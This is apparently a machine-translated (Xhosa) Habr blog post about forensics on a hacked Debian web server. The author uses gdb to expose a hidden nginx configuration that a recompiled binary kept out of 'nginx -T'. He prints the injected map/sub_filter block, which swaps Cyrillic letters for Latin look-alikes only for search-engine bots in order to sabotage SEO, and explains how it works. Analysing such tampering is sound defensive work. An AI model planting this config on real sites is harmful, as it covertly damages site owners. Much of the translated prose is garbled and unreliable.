Elona bali lalingemnandanga lenzeka komnye wabahlobo bam. Kodwa nangona kwakungemnandanga kuMikhail, kwakunjalo nakum.
Ndimele ndithi umhlobo wam ulungile UNIX-umsebenzisi: unokufaka inkqubo ngokwakhe mysql, php kwaye wenze izicwangciso ezilula nginx.
Kwaye uneshumi elinesibini okanye enye enesiqingatha iiwebhusayithi ezinikezelwe kwizixhobo zokwakha.
Enye yezi sayithi ezinikezelwe kwii-chainsaws zihlala ziqinile kwi-TOP yeenjini zokukhangela. Le ndawo ingumhloli ongeyontengiso, kodwa umntu othile wangena kumkhwa wokuyihlasela. Oko DDoS, emva koko amandla akhohlakeleyo, emva koko abhala amagqabantshintshi angcolileyo kwaye athumele ukuxhatshazwa kwi-hosting kunye ne-RKN.
Ngequbuliso, yonke into yazola kwaye oku kuzola kwajika kungalunganga, kwaye isiza saqala ukushiya imigca ephezulu yeziphumo zokukhangela.
Ibiyintetho ke leyo, ke ibali lika admin.
Lalisondele ixesha lokulala xa kukhala umnxeba: “San, awuzukuyijonga iseva yam? Kubonakala kum ukuba ndiqhekezwe, andinakungqina, kodwa imvakalelo ayizange indishiye kwiveki yesithathu. Mhlawumbi lixesha lokuba ndifumane unyango lweparanoia?"
Okulandelayo yingxoxo yesiqingatha seyure enokuthi ishwankathelwe ngolu hlobo lulandelayo:
- umhlaba woqhekezo wawuchumile;
- umhlaseli unokufumana amalungelo omsebenzisi ophezulu;
- uhlaselo (ukuba lwenzekile) lwalujoliswe ngokukodwa kwesi siza;
- iindawo ezinengxaki zilungisiwe kwaye kufuneka uqonde ukuba ngaba bekukho ukungena;
- i-hack ayikwazanga ukuchaphazela ikhowudi yesayithi kunye nogcino lwedatha.
Ngokuphathelele inqaku lokugqibela.
Kuphela i-IP yangaphambili emhlophe ejonge kwihlabathi. Akukho tshintshiselwano phakathi kwee-backends kunye ne-frontend ngaphandle kwe-http (s), abasebenzisi / amagama okugqithisa ahlukile, akukho zitshixo zatshintshiswayo. Kwiidilesi ezingwevu, onke amazibuko ngaphandle kwe80/443 avaliwe. Ii-IP zangasemva ezimhlophe ziyaziwa kuphela kubasebenzisi ababini, abo uMikhail abathembe ngokupheleleyo.
Ifakwe kwi-frontend Debian 9 kwaye ngexesha lokufowunelwa, inkqubo ibekwe yodwa kwihlabathi yi-firewall yangaphandle kwaye yamiswa.
“Ok, ndinike ithuba,” ndigqibe kwelokuba ndingalali kangangeyure. "Ndiza kubona ngamehlo am."
Apha nangaphezulu:
$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1
Ukukhangela i-hack enokwenzeka
Ndiqala iseva, kuqala ngaphakathi indlela yokuhlangula. Ndinyusa iidisks kwaye ndijika phakathi kwazo inyaniso-iinkuni, imbali, iilogi zenkqubo, njl., ukuba kunokwenzeka, ndikhangela imihla yokudalwa kweefayile, nangona ndiyaqonda ukuba i-cracker eqhelekileyo yayiza "kutshayela" emva kwayo, kwaye uMisha wayesele "enyathele" kakhulu ngelixa ezikhangelela yena. .
Ndiqala kwimo yesiqhelo, ndingekaqondi kakuhle ukuba mandijonge ntoni, ndifunda uqwalaselo. Okokuqala, ndinomdla nginx ekubeni, ngokubanzi, akukho nto yimbi kwi frontend ngaphandle kwayo.
Uqwalaselo luncinci, lucwangciswe kakuhle kwiifayile ezilishumi elinesibini, ndijonge kuzo ikati'oh omnye komnye. Yonke into ibonakala icocekile, kodwa awukwazi ukuba kukho into endiyiphosileyo zibandakanya, mandenze uludwe olupheleleyo:
$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful
Andizange ndiqonde: "Luphi uluhlu?"
$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module
Umbuzo wesibini wongezwa kumbuzo woluhlu: "Kutheni inguqulelo yakudala ye nginx?"
Ukongeza, inkqubo ikholelwa ukuba inguqulelo yamva nje ifakiwe:
$ dpkg -l nginx | grep "[n]ginx"
ii nginx 1.14.2-2+deb10u1 all small, powerful, scalable web/proxy server
ndiyabiza:
- Misha, kutheni uphinde wadibanisa nginx?
- Yima, andazi nokuba ndingayenza njani le nto!
- Kulungile, hamba uyolala ...
Nginx yakhiwe ngokucacileyo kwaye imveliso yoluhlu usebenzisa "-T" ifihliwe ngesizathu. Akusekho mathandabuzo malunga nokugqekeza kwaye unokuyamkela ngokulula kwaye (ekubeni uMisha watshintsha umncedisi ngentsha) qwalasela ingxaki esonjululweyo.
Kwaye ngenene, ekubeni umntu efumene amalungelo Ingcambu' ah, ngoko kuyavakala ukwenza inkqubo yokufaka kwakhona, kwaye kwakungenamsebenzi ukukhangela into engalunganga apho, kodwa ngeli xesha umdla waboyisa ubuthongo. Sinokuyifumana njani into ababefuna ukusifihlela yona?
Masizame ukulandelela:
$ strace nginx -T
Sijonge kuyo, kukho ngokucacileyo akukho migca eyaneleyo kumkhondo a la
write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf) = 21
write(1, "...
write(1, "n", 1
Ukuzonwabisa nje, makhe sithelekise iziphumo.
$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264
Ndicinga inxalenye yekhowudi /src/core/nginx.c
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 1;
break;
yaziswa kwifom:
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
//ngx_dump_config = 1;
break;
okanye
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 0;
break;
ngoko ke uluhlu luka "-T" aluboniswa.
Kodwa sinokulujonga njani uqwalaselo lwethu?
Ukuba ingcinga yam ichanekile kwaye ingxaki ikwimo eguquguqukayo kuphela ngx_dump_config makhe sizame ukuyifaka sisebenzisa gdb, ngethamsanqa kukho isitshixo --nge-cc-opt -g ngoku kwaye unethemba lolwando -O2 ayisayi kusenza buhlungu. Ngexesha elifanayo, kuba andazi ukuba njani ngx_dump_config inokusetyenzwa ngaphakathi imeko 'T':, asiyi kuyibiza le block, kodwa yifake usebenzisa imeko 't':
Kutheni ungasebenzisa u-'-t' kunye no-'-T'Block Processing ukuba(ngx_dump_config) kwenzeka ngaphakathi ukuba(ngx_test_config):
if (ngx_test_config) {
if (!ngx_quiet_mode) {
ngx_log_stderr(0, "configuration file %s test is successful",
cycle->conf_file.data);
}
if (ngx_dump_config) {
cd = cycle->config_dump.elts;
for (i = 0; i < cycle->config_dump.nelts; i++) {
ngx_write_stdout("# configuration file ");
(void) ngx_write_fd(ngx_stdout, cd[i].name.data,
cd[i].name.len);
ngx_write_stdout(":" NGX_LINEFEED);
b = cd[i].buffer;
(void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
ngx_write_stdout(NGX_LINEFEED);
}
}
return 0;
}
Ewe kunjalo, ukuba ikhowudi itshintshiwe kule nxalenye kwaye ayingeni imeko 'T':, ngoko indlela yam ayiyi kusebenza.
Vavanya nginx.confSele isombulule ingxaki ngovavanyo, kwafunyaniswa ukuba ubuncinci ubumbeko luyafuneka ukuze i-malware isebenze. nginx uhlobo:
events {
}
http {
include /etc/nginx/sites-enabled/*;
}
Siza kuyisebenzisela ubufutshane kwinqaku.
Qalisa idebugger
$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188 src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}
http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:
[Inferior 1 (process 32581) exited normally]
(gdb) quit
Inyathelo nenyathelo:
- seta i-breakpoint kumsebenzi ephambili ()
- sungula inkqubo
- tshintsha ixabiso lenguqu emisela imveliso yoqwalaselo ngx_dump_config=1
- qhubeka/uphelise inkqubo
Njengoko sibona, uqwalaselo lokwenyani lwahlukile kolwethu, sikhetha isiqwenga separasitic kuyo:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
Makhe sijonge okwenzekayo apha ngokulandelelana.
Ngaba uzimisele Ummeli woMsebenzisi'yandex/google:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
Amaphepha eenkonzo akaqukwanga Wordpress:
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
Kwaye abo bawela phantsi kweemeko zombini ezingentla
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
kwisicatshulwa html-amaphepha ayatshintsha 'O' phezu 'o' и 'A' phezu 'a':
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
Kunjalo, ubuqili kuphela bobo 'a' != 'a' njengo 'o' != 'o':
Ke, i-bots ye-injini yokukhangela ifumana, endaweni yesiqhelo i-100% yemibhalo yesiCyrillic, inkunkuma elungisiweyo exutywe nesiLatini. 'a' и 'o'. Andifuni ukuxoxa ngendlela oku kuchaphazela ngayo i-SEO, kodwa akunakwenzeka ukuba i-jumble yeleta enjalo iya kuba nefuthe elihle kwizikhundla kwiziphumo zophando.
Ndithini, guys nge imagination.
iimbekiselo
umthombo: www.habr.com